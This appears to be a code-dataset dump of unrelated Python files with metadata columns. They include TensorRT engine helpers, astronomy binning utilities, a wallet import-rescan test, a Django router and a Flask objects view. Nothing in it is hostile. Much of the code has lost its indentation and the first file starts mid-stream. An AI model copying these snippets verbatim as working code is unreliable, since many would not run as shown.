print("Mqtt'den: Topic: {}, Message: {}".format(topic,data))
if topic =="/blue":
db.collection(Fb_Coll).document("color").update({ topic: data })
print("SEND")
sleep(1)
    client = mqtt.Client()
    # Register the callbacks before connecting so the CONNACK and the first
    # messages are handled as soon as the network loop starts.
    client.on_connect = on_connect
    client.on_message = on_message
    client.connect(Server, 1883, 60)
    client.loop_forever()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\nPrograms was stopped")
sys.exit()
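# Illustrative check (editor addition; broker address and payload are assumptions):
# with the broker running, a message published to the subscribed topic should
# update the Firestore "color" document, e.g.
#   mosquitto_pub -h <broker-ip> -t /blue -m "128"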
| MyAwsomeMainCode/send_.py | 1,412 | Bu kod MQTT den alir FireBase e atar | 36 | tr | 0.368284 |
#
# SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Utility functions for building/saving/loading TensorRT Engine
import sys
import os
import tensorrt as trt
import pycuda.driver as cuda
import numpy as np
from utils.modeldata import ModelData
# ../../common.py
sys.path.insert(1,
os.path.join(
os.path.dirname(os.path.realpath(__file__)),
os.pardir,
os.pardir
)
)
from common import HostDeviceMem
def allocate_buffers(engine):
"""Allocates host and device buffer for TRT engine inference.
    This function is similar to the one in ../../common.py, but
converts network outputs (which are np.float32) appropriately
before writing them to Python buffer. This is needed, since
    TensorRT plugins don't support output type description, and
in our particular case, we use NMS plugin as network output.
Args:
engine (trt.ICudaEngine): TensorRT engine
Returns:
inputs [HostDeviceMem]: engine input memory
outputs [HostDeviceMem]: engine output memory
bindings [int]: buffer to device bindings
stream (cuda.Stream): cuda stream for engine inference synchronization
"""
inputs = []
outputs = []
bindings = []
stream = cuda.Stream()
# Current NMS implementation in TRT only supports DataType.FLOAT but
    # it may change in the future, which could break this sample here
# when using lower precision [e.g. NMS output would not be np.float32
# anymore, even though this is assumed in binding_to_type]
binding_to_type = {"Input": np.float32, "NMS": np.float32, "NMS_1": np.int32}
for binding in engine:
size = trt.volume(engine.get_binding_shape(binding)) * engine.max_batch_size
dtype = binding_to_type[str(binding)]
# Allocate host and device buffers
host_mem = cuda.pagelocked_empty(size, dtype)
device_mem = cuda.mem_alloc(host_mem.nbytes)
# Append the device buffer to device bindings.
bindings.append(int(device_mem))
# Append to the appropriate list.
if engine.binding_is_input(binding):
inputs.append(HostDeviceMem(host_mem, device_mem))
else:
outputs.append(HostDeviceMem(host_mem, device_mem))
return inputs, outputs, bindings, stream
def build_engine(uff_model_path, trt_logger, trt_engine_datatype=trt.DataType.FLOAT, batch_size=1, silent=False):
with trt.Builder(trt_logger) as builder, builder.create_network() as network, builder.create_builder_config() as config, trt.UffParser() as parser, trt.Runtime(trt_logger) as runtime:
config.max_workspace_size = 1 << 30
if trt_engine_datatype == trt.DataType.HALF:
config.set_flag(trt.BuilderFlag.FP16)
builder.max_batch_size = batch_size
parser.register_input(ModelData.INPUT_NAME, ModelData.INPUT_SHAPE)
parser.register_output("MarkOutput_0")
parser.parse(uff_model_path, network)
if not silent:
print("Building TensorRT engine. This may take few minutes.")
plan = builder.build_serialized_network(network, config)
return runtime.deserialize_cuda_engine(plan)
def save_engine(engine, engine_dest_path):
buf = engine.serialize()
with open(engine_dest_path, 'wb') as f:
f.write(buf)
def load_engine(trt_runtime, engine_path):
with open(engine_path, 'rb') as f:
engine_data = f.read()
engine = trt_runtime.deserialize_cuda_engine(engine_data)
return engine
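# --- Illustrative usage sketch (editor addition, not part of the original sample) ---
# The helpers above are typically combined as below; the file names and the
# inference steps are assumptions for illustration only.
#
#   TRT_LOGGER = trt.Logger(trt.Logger.WARNING)
#   engine = build_engine("model.uff", TRT_LOGGER, batch_size=1)
#   save_engine(engine, "model.buf")
#   ...
#   engine = load_engine(trt.Runtime(TRT_LOGGER), "model.buf")
#   inputs, outputs, bindings, stream = allocate_buffers(engine)
#   with engine.create_execution_context() as context:
#       # copy inputs to the device, run inference, copy results back to the host
#       cuda.memcpy_htod_async(inputs[0].device, inputs[0].host, stream)
#       context.execute_async(batch_size=1, bindings=bindings, stream_handle=stream.handle)
#       for out in outputs:
#           cuda.memcpy_dtoh_async(out.host, out.device, stream)
#       stream.synchronize()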
| samples/python/uff_ssd/utils/engine.py | 4,146 | Allocates host and device buffer for TRT engine inference.
This function is similair to the one in ../../common.py, but
converts network outputs (which are np.float32) appropriately
before writing them to Python buffer. This is needed, since
TensorRT plugins doesn't support output type description, and
in our particular case, we use NMS plugin as network output.
Args:
engine (trt.ICudaEngine): TensorRT engine
Returns:
inputs [HostDeviceMem]: engine input memory
outputs [HostDeviceMem]: engine output memory
bindings [int]: buffer to device bindings
stream (cuda.Stream): cuda stream for engine inference synchronization
SPDX-FileCopyrightText: Copyright (c) 1993-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved. SPDX-License-Identifier: Apache-2.0 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Utility functions for building/saving/loading TensorRT Engine ../../common.py Current NMS implementation in TRT only supports DataType.FLOAT but it may change in the future, which could brake this sample here when using lower precision [e.g. NMS output would not be np.float32 anymore, even though this is assumed in binding_to_type] Allocate host and device buffers Append the device buffer to device bindings. Append to the appropriate list. | 1,749 | en | 0.85045 |
from .imports import *
def rainbow_to_vector(r, timeformat='h'):
""" Convert Rainbow object to np.arrays
Parameters
----------
r : Rainbow object
chromatic Rainbow object to convert into array format
timeformat : str
(optional, default='hours')
The time format to use (seconds, minutes, hours, days etc.)
Returns
----------
rflux : np.array
flux (MJy/sr) [n_wavelengths x n_integrations]
rfluxe : np.array
flux error (MJy/sr) [n_wavelengths x n_integrations]
rtime : np.array
        time (BJD_TDB, hours) [n_integrations]
rwavel : np.array
wavelength (microns) [n_wavelengths]
"""
secondformat = ['second', 'seconds', 'sec', 's']
minuteformat = ['minute', 'minutes', 'min', 'm']
hourformat = ['hour', 'hours', 'h']
dayformat = ['day', 'days', 'd']
yearformat = ['year', 'years', 'y']
rflux = r.fluxlike['flux'] # flux (MJy/sr) : [n_wavelengths x n_integrations]
rfluxe = r.fluxlike['uncertainty'] # flux error (MJy/sr) : [n_wavelengths x n_integrations]
rtime = r.timelike['time'] # time (BJD_TDB, hours) : [n_integrations]
rwavel = r.wavelike['wavelength'] # wavelength (microns) : [n_wavelengths]
# change the time array into the requested format (e.g. seconds, minutes, days etc.)
if timeformat in secondformat:
rtime = rtime * 3600
elif timeformat in minuteformat:
rtime = rtime * 60
elif timeformat in hourformat:
# hours is the default time setting
pass
elif timeformat in dayformat:
rtime = rtime / 24.
elif timeformat in yearformat:
rtime = rtime / (24 * 365.)
else:
warnings.warn("Unrecognised Time Format!")
return
return rflux, rfluxe, rtime, rwavel
def rainbow_to_df(r, timeformat='h'):
""" Convert Rainbow object to pandas dataframe
Parameters
----------
r : Rainbow object
chromatic Rainbow object to convert into pandas df format
timeformat : str
(optional, default='hours')
The time format to use (seconds, minutes, hours, days etc.)
Returns
----------
pd.DataFrame
"""
rflux, rfluxe, rtime, rwavel = rainbow_to_vector(r, timeformat)
x, y = np.meshgrid(rtime.to_value(), rwavel.to_value())
rainbow_dict = {f"Time ({timeformat})": x.ravel(), "Wavelength (microns)": y.ravel(), "Flux": rflux.ravel(),
"Flux Error": rfluxe.ravel()}
df = pd.DataFrame(rainbow_dict)
return df
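# Editor note (illustrative; assumes `r` is a chromatic Rainbow object):
#   flux, flux_err, time, wavelength = rainbow_to_vector(r, timeformat='min')
#   df = rainbow_to_df(r, timeformat='min')  # long format: one row per (time, wavelength)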
def bin_data(jd, y, mins_jd):
t = np.array(jd)
split = []
sorted_t = t
sorted_y = y
start = sorted_t[0]
nextbin = sorted_t[np.absolute(sorted_t - start) > mins_jd]
    while len(nextbin) > 0:
start = start + mins_jd
ind_st = np.argmax(sorted_t > start)
if len(split) > 0:
if ind_st != split[-1]:
split.append(ind_st)
time = sorted_t[ind_st:]
# need to add defn for time here?
else:
split.append(ind_st)
time = sorted_t[ind_st:]
nextbin = time[np.absolute(time - start) > mins_jd]
times = np.split(sorted_t, split)
ys = np.split(sorted_y, split)
bins = np.zeros(len(times))
binned_y = np.zeros(len(times))
binned_err = np.zeros(len(times))
for i in range(len(times)):
if len(ys[i]) > 0:
try:
bins[i] = np.nanmean(times[i])
binned_y[i] = np.nanmean(ys[i])
n = len(times[i])
                # standard error in the median (alternative):
                # binned_err[i] = 1.253 * np.nanstd(ys[i]) / np.sqrt(n)
                # standard error in the mean:
                binned_err[i] = np.nanstd(ys[i]) / np.sqrt(n)
except Exception as e:
print(e)
pass
bin_t = bins[binned_y != 0]
bin_e = binned_err[binned_y != 0]
bin_y = binned_y[binned_y != 0]
return bin_t, bin_y, bin_e
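# Illustrative usage sketch (editor addition, not part of the original module):
# bin_data() groups samples into bins of width `mins_jd` (same units as `jd`) and
# returns the mean time, mean value and standard error per bin, e.g.
#   jd = np.linspace(0.0, 1.0, 101)            # 101 samples over one day
#   flux = 1.0 + 0.01 * np.random.randn(101)   # noisy, constant light curve
#   bin_t, bin_y, bin_e = bin_data(jd, flux, 0.1)   # ~10 bins of ~10 points each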
def find_nearest(array, value):
# array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
return idx
def remove_nans(arr_with_nans, *otherarrs):
nanfree_arrs = []
for arr in otherarrs:
nanfree_arrs.append(arr[~np.isnan(arr_with_nans)])
arr_without_nans = arr_with_nans[~np.isnan(arr_with_nans)]
return arr_without_nans, nanfree_arrs | src/utils.py | 4,410 | Convert Rainbow object to pandas dataframe
Parameters
----------
r : Rainbow object
chromatic Rainbow object to convert into pandas df format
timeformat : str
(optional, default='hours')
The time format to use (seconds, minutes, hours, days etc.)
Returns
----------
pd.DataFrame
Convert Rainbow object to np.arrays
Parameters
----------
r : Rainbow object
chromatic Rainbow object to convert into array format
timeformat : str
(optional, default='hours')
The time format to use (seconds, minutes, hours, days etc.)
Returns
----------
rflux : np.array
flux (MJy/sr) [n_wavelengths x n_integrations]
rfluxe : np.array
flux error (MJy/sr) [n_wavelengths x n_integrations]
rtime : np.array
time (BJD_TDB, houra) [n_integrations]
rwavel : np.array
wavelength (microns) [n_wavelengths]
flux (MJy/sr) : [n_wavelengths x n_integrations] flux error (MJy/sr) : [n_wavelengths x n_integrations] time (BJD_TDB, hours) : [n_integrations] wavelength (microns) : [n_wavelengths] change the time array into the requested format (e.g. seconds, minutes, days etc.) hours is the default time setting need to add defn for time here? standard error in the median: binned_err[i] = 1.253 * np.nanstd(ys[i]) / np.sqrt(n) array = np.asarray(array) | 1,358 | en | 0.374662 |
"""
This test will initialize the display using displayio
and draw a solid red background
"""
import board
import displayio
from adafruit_st7735r import ST7735R
spi = board.SPI()
tft_cs = board.D5
tft_dc = board.D6
displayio.release_displays()
display_bus = displayio.FourWire(spi, command=tft_dc, chip_select=tft_cs, reset=board.D9)
display = ST7735R(display_bus, width=128, height=160, bgr=True)
# Make the display context
splash = displayio.Group(max_size=10)
display.show(splash)
color_bitmap = displayio.Bitmap(128, 160, 1)
color_palette = displayio.Palette(1)
color_palette[0] = 0xFF0000
bg_sprite = displayio.TileGrid(color_bitmap,
pixel_shader=color_palette,
x=0, y=0)
splash.append(bg_sprite)
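# Editor note (illustrative): the palette stays live after the TileGrid is created,
# so the background colour can be changed later without rebuilding the bitmap, e.g.
#   color_palette[0] = 0x00FF00  # switch the fill to green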
while True:
pass
| infra/libs-400rc2-20190512/examples/st7735r_128x160_simpletest.py | 826 | This test will initialize the display using displayio
and draw a solid red background
Make the display context | 112 | en | 0.412232 |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test wallet import RPCs.
Test rescan behavior of importaddress, importpubkey, importprivkey, and
importmulti RPCs with different types of keys and rescan options.
In the first part of the test, node 0 creates an address for each type of
import RPC call and sends BTC to it. Then other nodes import the addresses,
and the test makes listtransactions and getbalance calls to confirm that the
importing node either did or did not execute rescans picking up the send
transactions.
In the second part of the test, node 0 sends more BTC to each address, and the
test makes more listtransactions and getbalance calls to confirm that the
importing nodes pick up the new transactions regardless of whether rescans
happened previously.
"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (assert_raises_rpc_error, connect_nodes, sync_blocks, assert_equal, set_node_times)
import collections
import enum
import itertools
import sys
Call = enum.Enum("Call", "single multi")
Data = enum.Enum("Data", "address pub priv")
Rescan = enum.Enum("Rescan", "no yes late_timestamp")
class Variant(collections.namedtuple("Variant", "call data rescan prune")):
"""Helper for importing one key and verifying scanned transactions."""
def try_rpc(self, func, *args, **kwargs):
if self.expect_disabled:
assert_raises_rpc_error(-4, "Rescan is disabled in pruned mode", func, *args, **kwargs)
else:
return func(*args, **kwargs)
def do_import(self, timestamp):
"""Call one key import RPC."""
if self.call == Call.single:
if self.data == Data.address:
response = self.try_rpc(self.node.importaddress, self.address["address"], self.label,
self.rescan == Rescan.yes)
elif self.data == Data.pub:
response = self.try_rpc(self.node.importpubkey, self.address["pubkey"], self.label,
self.rescan == Rescan.yes)
elif self.data == Data.priv:
response = self.try_rpc(self.node.importprivkey, self.key, self.label, self.rescan == Rescan.yes)
assert_equal(response, None)
elif self.call == Call.multi:
response = self.node.importmulti([{
"scriptPubKey": {
"address": self.address["address"]
},
"timestamp": timestamp + TIMESTAMP_WINDOW + (1 if self.rescan == Rescan.late_timestamp else 0),
"pubkeys": [self.address["pubkey"]] if self.data == Data.pub else [],
"keys": [self.key] if self.data == Data.priv else [],
"label": self.label,
"watchonly": self.data != Data.priv
}], {"rescan": self.rescan in (Rescan.yes, Rescan.late_timestamp)})
assert_equal(response, [{"success": True}])
def check(self, txid=None, amount=None, confirmations=None):
"""Verify that getbalance/listtransactions return expected values."""
balance = self.node.getbalance(self.label, 0, False, True)
assert_equal(balance, self.expected_balance)
txs = self.node.listtransactions(self.label, 10000, 0, True)
assert_equal(len(txs), self.expected_txs)
if txid is not None:
tx, = [tx for tx in txs if tx["txid"] == txid]
assert_equal(tx["account"], self.label)
assert_equal(tx["address"], self.address["address"])
assert_equal(tx["amount"], amount)
assert_equal(tx["category"], "receive")
assert_equal(tx["label"], self.label)
assert_equal(tx["txid"], txid)
assert_equal(tx["confirmations"], confirmations)
assert_equal("trusted" not in tx, True)
# Verify the transaction is correctly marked watchonly depending on
# whether the transaction pays to an imported public key or
# imported private key. The test setup ensures that transaction
# inputs will not be from watchonly keys (important because
# involvesWatchonly will be true if either the transaction output
# or inputs are watchonly).
if self.data != Data.priv:
assert_equal(tx["involvesWatchonly"], True)
else:
assert_equal("involvesWatchonly" not in tx, True)
# List of Variants for each way a key or address could be imported.
IMPORT_VARIANTS = [Variant(*variants) for variants in itertools.product(Call, Data, Rescan, (False, True))]
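# Editor note: itertools.product over 2 call styles, 3 key data types, 3 rescan
# modes and 2 prune settings yields 36 import variants in total.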
# List of nodes to import keys to. Half the nodes will have pruning disabled,
# half will have it enabled. Different nodes will be used for imports that are
# expected to cause rescans, and imports that are not expected to cause
# rescans, in order to prevent rescans during later imports picking up
# transactions associated with earlier imports. This makes it easier to keep
# track of expected balances and transactions.
ImportNode = collections.namedtuple("ImportNode", "prune rescan")
IMPORT_NODES = [ImportNode(*fields) for fields in itertools.product((False, True), repeat=2)]
# Rescans start at the earliest block up to 2 hours before the key timestamp.
TIMESTAMP_WINDOW = 2 * 60 * 60
class ImportRescanTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2 + len(IMPORT_NODES)
def setup_network(self):
extra_args = [[] for _ in range(self.num_nodes)]
for i, import_node in enumerate(IMPORT_NODES, 2):
if import_node.prune:
# txindex is enabled by default in Dash and needs to be disabled for import-rescan.py
extra_args[i] += ["-prune=1", "-txindex=0", "-reindex"]
self.add_nodes(self.num_nodes, extra_args, stderr=sys.stdout)
self.start_nodes()
for i in range(1, self.num_nodes):
connect_nodes(self.nodes[i], 0)
def run_test(self):
# Create one transaction on node 0 with a unique amount and label for
# each possible type of wallet import RPC.
for i, variant in enumerate(IMPORT_VARIANTS):
variant.label = "label {} {}".format(i, variant)
variant.address = self.nodes[1].validateaddress(self.nodes[1].getnewaddress(variant.label))
variant.key = self.nodes[1].dumpprivkey(variant.address["address"])
variant.initial_amount = 10 - (i + 1) / 4.0
variant.initial_txid = self.nodes[0].sendtoaddress(variant.address["address"], variant.initial_amount)
# Generate a block containing the initial transactions, then another
# block further in the future (past the rescan window).
self.nodes[0].generate(1)
assert_equal(self.nodes[0].getrawmempool(), [])
timestamp = self.nodes[0].getblockheader(self.nodes[0].getbestblockhash())["time"]
set_node_times(self.nodes, timestamp + TIMESTAMP_WINDOW + 1)
self.nodes[0].generate(1)
self.sync_blocks()
# For each variation of wallet key import, invoke the import RPC and
# check the results from getbalance and listtransactions.
for variant in IMPORT_VARIANTS:
variant.expect_disabled = variant.rescan == Rescan.yes and variant.prune and variant.call == Call.single
expect_rescan = variant.rescan == Rescan.yes and not variant.expect_disabled
variant.node = self.nodes[2 + IMPORT_NODES.index(ImportNode(variant.prune, expect_rescan))]
variant.do_import(timestamp)
if expect_rescan:
variant.expected_balance = variant.initial_amount
variant.expected_txs = 1
variant.check(variant.initial_txid, variant.initial_amount, 2)
else:
variant.expected_balance = 0
variant.expected_txs = 0
variant.check()
# Create new transactions sending to each address.
for i, variant in enumerate(IMPORT_VARIANTS):
variant.sent_amount = 10 - (2 * i + 1) / 8.0
variant.sent_txid = self.nodes[0].sendtoaddress(variant.address["address"], variant.sent_amount)
# Generate a block containing the new transactions.
self.nodes[0].generate(1)
assert_equal(self.nodes[0].getrawmempool(), [])
self.sync_blocks()
# Check the latest results from getbalance and listtransactions.
for variant in IMPORT_VARIANTS:
if not variant.expect_disabled:
variant.expected_balance += variant.sent_amount
variant.expected_txs += 1
variant.check(variant.sent_txid, variant.sent_amount, 1)
else:
variant.check()
if __name__ == "__main__":
ImportRescanTest().main()
| test/functional/import-rescan.py | 9,050 | Helper for importing one key and verifying scanned transactions.
Verify that getbalance/listtransactions return expected values.
Call one key import RPC.
Test wallet import RPCs.
Test rescan behavior of importaddress, importpubkey, importprivkey, and
importmulti RPCs with different types of keys and rescan options.
In the first part of the test, node 0 creates an address for each type of
import RPC call and sends BTC to it. Then other nodes import the addresses,
and the test makes listtransactions and getbalance calls to confirm that the
importing node either did or did not execute rescans picking up the send
transactions.
In the second part of the test, node 0 sends more BTC to each address, and the
test makes more listtransactions and getbalance calls to confirm that the
importing nodes pick up the new transactions regardless of whether rescans
happened previously.
!/usr/bin/env python3 Copyright (c) 2014-2016 The Bitcoin Core developers Distributed under the MIT software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php. Verify the transaction is correctly marked watchonly depending on whether the transaction pays to an imported public key or imported private key. The test setup ensures that transaction inputs will not be from watchonly keys (important because involvesWatchonly will be true if either the transaction output or inputs are watchonly). List of Variants for each way a key or address could be imported. List of nodes to import keys to. Half the nodes will have pruning disabled, half will have it enabled. Different nodes will be used for imports that are expected to cause rescans, and imports that are not expected to cause rescans, in order to prevent rescans during later imports picking up transactions associated with earlier imports. This makes it easier to keep track of expected balances and transactions. Rescans start at the earliest block up to 2 hours before the key timestamp. txindex is enabled by default in Dash and needs to be disabled for import-rescan.py Create one transaction on node 0 with a unique amount and label for each possible type of wallet import RPC. Generate a block containing the initial transactions, then another block further in the future (past the rescan window). For each variation of wallet key import, invoke the import RPC and check the results from getbalance and listtransactions. Create new transactions sending to each address. Generate a block containing the new transactions. Check the latest results from getbalance and listtransactions. | 2,577 | en | 0.827854 |
#
# -------------------------------------------------------------------------
# Copyright (c) 2018 Intel Corporation Intellectual Property
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -------------------------------------------------------------------------
#
"""Test case for RootController /"""
import json
from conductor import version
from conductor.tests.unit.api import base_api
class TestRoot(base_api.BaseApiTest):
def test_get_index(self):
actual_response = self.app.get('/')
req_json_file = './conductor/tests/unit/api/controller/versions.json'
expected_response = json.loads(open(req_json_file).read())
versions = expected_response.get('versions')
for version_obj in versions:
version_obj['version'] = "of-has:{}".format(version.version_info.version_string())
self.assertEqual(200, actual_response.status_int)
self.assertJsonEqual(expected_response,
json.loads(actual_response.body.decode()))
| conductor/conductor/tests/unit/api/controller/test_root.py | 1,536 | Test case for RootController /
------------------------------------------------------------------------- Copyright (c) 2018 Intel Corporation Intellectual Property Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ------------------------------------------------------------------------- | 781 | en | 0.734668 |
from apollo.viewsets import UserViewSet
from applications.assets.viewsets import EquipmentViewSet, ServiceViewSet
from applications.business.viewsets import BusinessViewSet, BusinessMembershipViewSet
from applications.charge_list.viewsets import ChargeListViewSet, ActivityChargeViewSet, \
ActivityChargeActivityCountViewSet, TimeChargeViewSet, UnitChargeViewSet
from applications.price_list.viewsets import PriceListViewSet, ActivityPriceListItemViewSet, TimePriceListItemViewSet, \
UnitPriceListItemViewSet, PriceListItemEquipmentViewSet, PriceListItemServiceViewSet
from applications.station.viewsets import StationViewSet, StationBusinessViewSet, StationRentalViewSet
from applications.terms_of_service.viewsets import TermsOfServiceViewSet
from rest_framework.routers import DefaultRouter
# Internal API Definition
router = DefaultRouter()
router.register(r'account/user', UserViewSet, base_name='user')
router.register(r'account/terms_of_service', TermsOfServiceViewSet, base_name='terms-of-service')
router.register(r'business/business', BusinessViewSet, base_name='business')
router.register(r'business/business_membership', BusinessMembershipViewSet, base_name='business-membership')
router.register(r'equipment/equipment', EquipmentViewSet, base_name='equipment')
router.register(r'equipment/service', ServiceViewSet, base_name='service')
router.register(r'station/station', StationViewSet, base_name='station')
router.register(r'station/station_business', StationBusinessViewSet, base_name='station-business')
router.register(r'station/station_rental', StationRentalViewSet, base_name='station-rental')
router.register(r'price_list/price_list', PriceListViewSet, base_name='price-list')
router.register(r'price_list/activity_item', ActivityPriceListItemViewSet, base_name='activity-price-list-item')
router.register(r'price_list/time_item', TimePriceListItemViewSet, base_name='time-price-list-item')
router.register(r'price_list/unit_item', UnitPriceListItemViewSet, base_name='unit-price-list-item')
router.register(r'price_list/equipment_relation', PriceListItemEquipmentViewSet, base_name='price-list-item-equipment')
router.register(r'price_list/service_relation', PriceListItemServiceViewSet, base_name='price-list-item-service')
router.register(r'charge_list/charge_list', ChargeListViewSet, base_name='charge-list')
router.register(r'charge_list/activity_charge', ActivityChargeViewSet, base_name='activity-charge')
router.register(r'charge_list/activity_charge_activity_count', ActivityChargeActivityCountViewSet,
base_name='activity-charge-activity-count')
router.register(r'charge_list/time_charge', TimeChargeViewSet, base_name='time-charge')
router.register(r'charge_list/unit_charge', UnitChargeViewSet, base_name='unit-charge')
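# Illustrative wiring (editor addition; module name and URL prefix are assumptions):
#   # e.g. in a URLconf such as apollo/urls.py
#   from django.urls import include, path
#   from apollo.router import router
#   urlpatterns = [path('api/', include(router.urls))]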
| apollo/router.py | 2,781 | Internal API Definition | 23 | en | 0.438078 |
from whey.mixin import BuilderMixin
class GettextMixin:
def build_messages(self: BuilderMixin):
from babel.messages.mofile import write_mo
from babel.messages.pofile import read_po
locales = self.pkgdir / "locales"
if self.verbose:
print(" Building messages")
for po in locales.glob("*/LC_MESSAGES/pm2hw.po"):
with po.open("rt", encoding="UTF-8") as f:
catalog = read_po(f, po.parts[-3], po.stem)
mo = self.build_dir / po.relative_to(self.project_dir).with_suffix(".mo")
mo.parent.maybe_make(parents=True)
with mo.open("wb") as f:
write_mo(f, catalog)
self.report_written(mo)
if self.verbose:
print(" Wrote language file:", mo)
# class SDistBuilder(GettextMixin, builder.SDistBuilder):
# def call_additional_hooks(self):
# self.build_messages()
# class WheelBuilder(GettextMixin, builder.WheelBuilder):
# def call_additional_hooks(self):
# self.build_messages()
| build_hooks.py | 925 | class SDistBuilder(GettextMixin, builder.SDistBuilder): def call_additional_hooks(self): self.build_messages() class WheelBuilder(GettextMixin, builder.WheelBuilder): def call_additional_hooks(self): self.build_messages() | 227 | en | 0.539856 |
# coding: utf-8
"""
"""
from copy import deepcopy
import datetime
import io
import json
import math
import os
import zipfile
import flask
import flask_login
import itsdangerous
import werkzeug.utils
from flask_babel import _
from . import frontend
from .. import logic
from .. import models
from .. import db
from ..logic import user_log, object_log, comments, object_sorting
from ..logic.actions import get_action, get_actions, get_action_type, get_action_types
from ..logic.action_type_translations import get_action_types_with_translations_in_language, \
get_action_type_with_translation_in_language
from ..logic.action_translations import get_action_with_translation_in_language
from ..logic.action_permissions import get_user_action_permissions, get_sorted_actions_for_user
from ..logic.object_permissions import Permissions, get_user_object_permissions, object_is_public, get_object_permissions_for_users, set_object_public, set_user_object_permissions, set_group_object_permissions, set_project_object_permissions, get_objects_with_permissions, get_object_info_with_permissions, get_object_permissions_for_groups, get_object_permissions_for_projects, request_object_permissions
from ..logic.datatypes import JSONEncoder
from ..logic.instrument_translations import get_instrument_with_translation_in_language
from ..logic.users import get_user, get_users, get_users_by_name
from ..logic.schemas import validate, generate_placeholder
from ..logic.settings import get_user_settings, set_user_settings
from ..logic.object_search import generate_filter_func, wrap_filter_func
from ..logic.groups import get_group, get_user_groups
from ..logic.objects import create_object, create_object_batch, update_object, get_object, get_object_versions
from ..logic.object_log import ObjectLogEntryType
from ..logic.projects import get_project, get_user_projects, get_user_project_permissions
from ..logic.locations import get_location, get_object_ids_at_location, get_object_location_assignment, get_object_location_assignments, get_locations, assign_location_to_object, get_locations_tree
from ..logic.languages import get_language_by_lang_code, get_language, get_languages, Language, get_user_language
from ..logic.files import FileLogEntryType
from ..logic.errors import GroupDoesNotExistError, ObjectDoesNotExistError, UserDoesNotExistError, ActionDoesNotExistError, ValidationError, ProjectDoesNotExistError, LocationDoesNotExistError, ActionTypeDoesNotExistError
from ..logic.notebook_templates import get_notebook_templates
from .objects_forms import ObjectPermissionsForm, ObjectForm, ObjectVersionRestoreForm, ObjectUserPermissionsForm, CommentForm, ObjectGroupPermissionsForm, ObjectProjectPermissionsForm, FileForm, FileInformationForm, FileHidingForm, ObjectLocationAssignmentForm, ExternalLinkForm, ObjectPublicationForm, CopyPermissionsForm
from ..utils import object_permissions_required
from .utils import jinja_filter, generate_qrcode
from .object_form_parser import parse_form_data
from .labels import create_labels, PAGE_SIZES, DEFAULT_PAPER_FORMAT, HORIZONTAL_LABEL_MARGIN, VERTICAL_LABEL_MARGIN, mm
from . import pdfexport
from .utils import check_current_user_is_not_readonly
from ..logic.utils import get_translated_text
__author__ = 'Florian Rhiem <f.rhiem@fz-juelich.de>'
def on_unauthorized(object_id):
permissions_by_user = get_object_permissions_for_users(object_id)
has_grant_user = any(
Permissions.GRANT in permissions
for permissions in permissions_by_user.values()
)
return flask.render_template('objects/unauthorized.html', object_id=object_id, has_grant_user=has_grant_user), 403
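# Editor note (illustrative): the view below accepts optional query parameters that
# are parsed further down, e.g. an assumed request like
#   /objects/?q=temperature&action=1&limit=25&offset=0&sortby=_creation_date&order=desc
# 'ids' bypasses filtering, while 'user', 'doi', 'location', 't' (action type),
# 'project' and 'group' restrict the result set.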
@frontend.route('/objects/')
@flask_login.login_required
def objects():
object_ids = flask.request.args.get('ids', '')
objects = []
display_properties = []
display_property_titles = {}
user_language_id = logic.languages.get_user_language(flask_login.current_user).id
if 'display_properties' in flask.request.args:
for property_info in flask.request.args.get('display_properties', '').split(','):
if ':' in property_info:
property_name, property_title = property_info.split(':', 1)
else:
property_name, property_title = property_info, property_info
if property_name not in display_properties:
display_properties.append(property_name)
display_property_titles[property_name] = property_title
name_only = True
if object_ids:
object_ids = object_ids.split(',')
try:
object_ids = [int(object_id) for object_id in object_ids]
except ValueError:
object_ids = []
readable_object_ids = []
for object_id in object_ids:
if Permissions.READ in get_user_object_permissions(object_id, user_id=flask_login.current_user.id):
readable_object_ids.append(object_id)
object_ids = readable_object_ids
for object_id in object_ids:
try:
objects.append(get_object(object_id))
except logic.errors.ObjectDoesNotExistError:
pass
action_id = None
action = None
action_type = None
project_id = None
location_id = None
location = None
user = None
user_id = None
doi = None
object_ids_at_location = None
project = None
group = None
group_id = None
query_string = ''
use_advanced_search = False
must_use_advanced_search = False
advanced_search_had_error = False
search_notes = []
search_tree = None
limit = None
offset = None
pagination_enabled = True
num_objects_found = len(objects)
sorting_property_name = None
sorting_order_name = None
else:
pagination_enabled = True
try:
user_id = int(flask.request.args.get('user', ''))
user = get_user(user_id)
except ValueError:
user_id = None
user = None
except UserDoesNotExistError:
user_id = None
user = None
if user_id is not None:
user_permissions = {
